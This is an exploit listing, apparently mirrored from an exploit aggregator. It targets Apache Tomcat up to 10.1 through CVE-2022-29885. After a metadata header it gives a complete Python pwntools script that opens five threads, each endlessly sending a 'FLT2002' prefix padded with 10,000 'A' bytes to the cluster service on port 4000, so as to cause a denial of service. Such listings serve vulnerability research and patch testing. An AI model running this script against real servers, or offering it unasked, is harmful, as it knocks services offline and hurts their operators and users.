Share
## https://sploitus.com/exploit?id=PACKETSTORM:171728
# Exploit Title: Apache Tomcat 10.1 - Denial Of Service  
# Google Dork: N/A  
# Date: 13/07/2022  
# Exploit Author: Cristian 'void' Giustini  
# Vendor Homepage: https://tomcat.apache.org/  
# Software Link: https://tomcat.apache.org/download-10.cgi  
# Version: <= 10.1  
# Tested on: Apache Tomcat 10.0 (Docker)  
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)  
# Exploit pre-requirements: pip install pwntools==4.8.0  
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/   
  
  
  
  
  
#!/usr/bin/env python3  
  
# coding: utf-8  
  
from pwn import *  
  
import time  
  
import threading  
  
import subprocess  
  
threads = []  
  
  
  
  
  
def send_payload():  
  
r = remote("localhost", 4000)  
  
while True:  
  
r.send(b"FLT2002" + b"A" * 10000)  
  
  
  
for _ in range(5):  
  
new_thread = threading.Thread(target=send_payload)  
  
threads.append(new_thread)  
  
new_thread.start()  
  
for old_thread in threads:  
  
old_thread.join()